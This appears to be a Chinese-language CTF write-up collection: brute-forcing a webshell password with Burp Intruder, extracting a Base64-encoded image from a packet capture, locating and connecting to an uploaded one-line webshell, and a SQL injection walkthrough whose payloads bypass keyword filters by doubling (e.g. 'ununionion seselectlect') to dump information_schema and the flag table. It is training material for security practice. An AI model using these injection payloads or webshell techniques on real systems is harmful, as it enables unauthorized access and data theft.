访问题目地址 用御剑扫一下,发现了一个shell.php 访问shell.php,随便输入一个,然后用burpsuite抓包 右键,点击Send to Intruder Payload type:选择Simple list,Add from list选择Passwords,然后点击右上方的Start attack 发现当payload为hack,length为1110 提交hack,得到flag
题目描述:公安机关近期截获到某网络犯罪团伙在线交流的数据包,但无法分析出具体的交流内容,聪明的你能帮公安机关找到线索吗? 注意:得到的 flag 请包上 flag{} 提交 下载附件,用wireshark打开。 追踪http流,发现了一段密文,密文以=结尾,猜想应该是Base64 进行Base64解码,发现都是乱码。 换个Base64解密网站,继续进行解密,发现是转存为了jpg文件,怪不得会乱码。 下载图片,flag就出来了
题目描述: 小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。 注意:得到的 flag 请包上 flag{} 提交
将下载的附件解压,然后使用D盾扫描,发现了两个可疑的文件。 查看一下这两个文件,在其中一个文件中发现了flag。
使用蚁剑进行操作,一句话木马中给出密码是Syc,进行添加。
点击进入添加的地址
查看目录,看到flag文件 点击flag文件,得到flag。
1. 万能密码注入 尝试万能密码 1' or 1=1 #,报错语句中没有看到or,or被过滤 尝试双写or:1' oorr 1=1 #,没有报错,应该是双写绕过 2. 查字段 构造payload:
?username=admin&password=pwd %27 union select 1 %23报错提示中只保留了 1# ,说明union和select都被过滤了
双写union和select,继续注入
?username=admin&password=123456 %27 ununionion seselectlect 1 %23注入成功,但报错语句告诉我们列数不对 继续构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,3 %23发现注入成功,字段为3
3. 爆数据库
Payload: ?username=admin&password=123456%20%27 ununionion seselectlect 1,2,database() %23获取到当前库名为geek 查看所有库名
Payload: ?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) %23看到了一个名为ctf的数据库,flag应该在这
查表 ?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23发现了一个名为Flag的表
查字段名 构造payload: ?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23 获取数据 ?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23得到flag
